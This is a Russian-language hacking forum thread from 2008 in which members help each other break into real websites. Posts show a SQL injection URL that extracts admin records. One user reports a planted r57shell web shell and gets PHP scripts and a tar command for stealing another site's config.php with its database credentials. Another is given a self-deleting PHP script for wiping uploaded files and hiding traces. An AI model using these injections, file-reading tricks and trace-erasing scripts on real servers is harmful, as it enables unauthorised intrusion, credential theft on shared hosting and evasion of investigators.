Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Отображается так же одна запись как и при limit 0,1

    Получается там все одна запись?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    да, 100%, иначе group_concat вытащил бы несколько записей по любому

    и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.
     
    #4282 Pashkela, 27 Dec 2008
    Last edited: 27 Dec 2008
    1 person likes this.
  3. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Похоже на то...
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Я что-то пропустил. или count() отменили? )

    Разве так не проще?
    http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--
     
    3 people like this.
  5. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    jokester, Действительно, так проще, и запись действительно одна.
     
    1 person likes this.
  6. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    jokester
    Если не ошибаюсь, то count() и null ячейки будет считать,и пустые.
    Например покажет, что записей 25, а будет всего 3, остальные пустые.Но он их посчитает.
     
    1 person likes this.
  7. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Для начала всех с наступающим новым годом ))
    Теперь вопрос.
    Поимел шелл на серваке, не на том сайте, который мне нужен,но надеясь получить к нему доступ.
    Safe_mode оказался: OFF
    Нахожусь в директории где шелл (путь)
    /home/s/site/site.com/public/www/admin/
    При попытке перейти в директорию /home/ редиректит назад на /home/s/site/site.com/public/www/admin/
    Шелл
    (r57shell v.1.42)
    Если выполняю команду ls -la /home/ переходит удачно и всё показывает. Так добрался до нужного мне сайта
    ls -la /home/t/target/target.com/public/www/
    Там нашёл файл config.php, с данными для коннекта к бд.
    Как мне его прочитать?
    Скачать не получилось
    Ввожу в :: Download files from server :: путь к файлу
    /home/t/target/target.com/public/www/config.php
    редиректит назад в директорию с шеллом.
    Если выполняю команду
    more /home/t/target/target.com/public/www/config.php
    или
    more config.php
    выдаёт пустой экран в шелле.
    Что делать? Я почти неделю убил на поиск уязвимостей, и тут такой облом :'(

    Вот стат с шелла

    PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: ON mSQL: OFF SQLite: ON
    Safe_mode: OFF Open_basedir: VIRTUAL_DOCUMENT_ROOT:/usr/local/lib/php:/usr/local/lib/ph:/home/sys/phplib/:/usr/local/bin/ Safe_exec_dir: /usr/local/php/bin Safe_gid: OFF Safe_include_dir: NONE Sql.safe_mode: OFF
    Disable functions : NONE
    Free space : 0 B Total space: 0 B
    Useful: mod_include(SSI)
    Dangerous: -
    Downloaders: fopen

    И ещё вопрос. Все сайты на одном серваке, но на многих PHP version: 5.2.6 а на некотрых четвёртая. (в том числе и на том, на который я залил шелл) Как так?
    Помогите прочитать файл плз (или скачать его).Очень прошу.
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Попробовать сделать так - написать и залить туда такой скрипт:

    PHP:
    <?
      
    $file file_get_contents("абсолютный_путь_к_файлу");
      if(!
    file) echo 'Ошибка открытия файла';
      else echo 
    $file;
    ?>
     
    #4288 Pashkela, 27 Dec 2008
    Last edited: 27 Dec 2008
  9. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    2
    Pashkela +
    2
    Imperou$
    Если не выйдет-из папки с шеллом выполняем
    tar -czvf arch.tar.gz /home/t/target/target.com/public/www/
    можешь и файл вписать.
    Cоздаст архив arch.tar.gz в папке с шеллом, внутри будет необходимое тебе содержание.Просто скачай и смотри.
     
  10. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    ThreeD
    Спасибо, плюс.
    Но архивит весь сайт =) Теперь качаю.
    Pashkela
     
  11. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Хыыы...
    Теперь у меня вопрос =)
    Нифига не могу удалить через шелл с сервака свои залитые файлы. Т.е. залить любой могу, а вот удалить нет.
    Ни
    rm
    rm -r
    rm -f
    rm -rf
    Не помогают =(
    Вопрос, как быть? Снести надо сроооочно, иначе ппц паливо устроят.
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 ThreeD:

    http://ru2.php.net/manual/ru/function.chown.php
    http://ru2.php.net/manual/ru/function.chmod.php

    Главное: http://ru2.php.net/unlink


    2 Imperou$:

    PHP:
    is not within the allowed path(sin /home/s/site/site.com/public/www/1.php on line 2
    вообще-то это тот сервер, где ты сейчас со своим шеллом сидишь, возьми да поправь
     
    #4292 Pashkela, 27 Dec 2008
    Last edited: 27 Dec 2008
  13. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Pashkela
    В php не силён.Давай подробнее. Кодить не умею я =)
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Делаешь такой скрипт, обзываешь его del.php к примеру, заливаешь на сайт:

    PHP:
    <? unlink ('абсолютный_путь_ до_файла/то_что хотим_удалить'); 
    unlink ('абсолютный_путь_ до_файла/del.php'); //Самоудаляемся, не оставляем вообще никаких следов, кроме как в логах фтп и прочих
    ?>
    запускаешь
     
    #4294 Pashkela, 27 Dec 2008
    Last edited: 27 Dec 2008
  15. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Pashkela

    Я залил скрипт 1.php с таким содержанием

    PHP:
    <? 
      
    $file file_get_contents("/home/t/target/target.com/public/www/config.php"); 
      if(!
    file) echo 'Ошибка открытия файла'
      else echo 
    $file
    ?>
    на серв /home/s/site/site.com/public/www/
    Что поменять?? o_O
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Imperou$:

    PHP:
     in /home/s/site/site.com/public/www/1.php on line 2
    Забей, юзай способ от ThreeD, только в конце укажи название файла, а не просто директорию
     
    #4296 Pashkela, 27 Dec 2008
    Last edited: 27 Dec 2008
  17. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Народ есть sql inj. Определяю через group by что количество столбцов 5. Но когда пытаюсь использовать id=1'+union+select+1,2,3,4,5/* говорит Query failed: The used SELECT statements have a different number of columns хотя group by говорит что их именно 5. В чем может быть проблема?

    На запрос id=1' получаю ответ Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' ORDER BY issue_date DESC LIMIT 1' at line 3

    Такое впечатление что injection тут после ORDER BY. Но что то я не могу найти где подробней про нее почитать. Может кто подскажет ?
     
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj
     
  19. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0

    Все ошибки что есть я запостил.
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    если можешь, ссылку кинь в личку
     
Thread Status:
Not open for further replies.